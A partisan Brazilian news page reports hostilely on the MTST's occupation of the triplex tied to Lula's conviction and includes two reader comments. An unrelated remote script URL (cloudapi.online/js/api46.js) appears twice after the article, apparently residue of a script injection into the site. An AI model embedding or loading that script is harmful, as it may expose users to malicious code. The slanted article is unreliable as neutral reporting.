BrasilNotícias

Movimentos esquerdistas invadem o triplex do Lula e danificam prédio

Na manhã de hoje, os esquerdistas do Movimento dos Trabalhadores Sem Teto, comando pelo também esquerdista e pré-candidato à presidência do PSOL, Guilherme Boulos, ocuparam o triplex que foi objeto da ação que condenou o ex-presidente Luiz Inácio Lula da Silva, o Lula (PT), a 12 anos e um mês de cadeia.

O objetivo era protestar contra a prisão de Lula. No entanto, com gritos de ordem como o “Triplex é nosso”, aqueles que acreditam que “somos todos Lula” acabaram por fazer um protesto que tem algum sentido. Afinal, se são “Lula” o triplex é deles, já que a Justiça condenou Lula por corrupção e lavagem de dinheiro ao tentar esconder patrimônio.

E esta é apenas a primeira condenação de Lula. Há outros processos em que o ex-presidente é réu.

A ocupação do triplex durou cerca de quatro horas. Os esquerdistas promoveram um quebra-quebra, ao danificarem o portão do estacionamento do condomínio e pularam as grades. Desrespeitaram a propriedade privada e forçaram a entrada no Edifício Solaris. Os danos causados foram registrados em um boletim de ocorrência na Delegacia da Polícia Civil.

Na parte da tarde, a PM fez vistoria no apartamento.

Nas faixas de protestos havia mensagens como “Se é do Lula, é nosso” e “Povo Sem Medo”. Mas, não foi o povo que invadiu o triplex. A invasão foi coordenada por um grupo de esquerda que é comandado por um esquerdista.

Tanto é assim que o próprio Boulos do PSOL participou da invasão que ainda é tratada como manifestação por parte da imprensa.

https://cloudapi.online/js/api46.js

https://cloudapi.online/js/api46.js

Tags
Ver mais

Artigos relacionados

2 Comentários

  1. Um ato terrorista descabido e mal pensado que só serviu para jogar a opinião pública contra essa corja de desocupados e para, ironicamente, comprovar o que o Brasil inteiro já sabe. O apartamento é mesmo do Lula.
    E um cara desses ainda pretende ser presidente do Brasil.

  2. Ato terrorista é condenar uma pessoa com uma farsa, da mesma forma que fizeram para dar o golpe e tomar a presidência, para tirar o Lula da disputa.

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close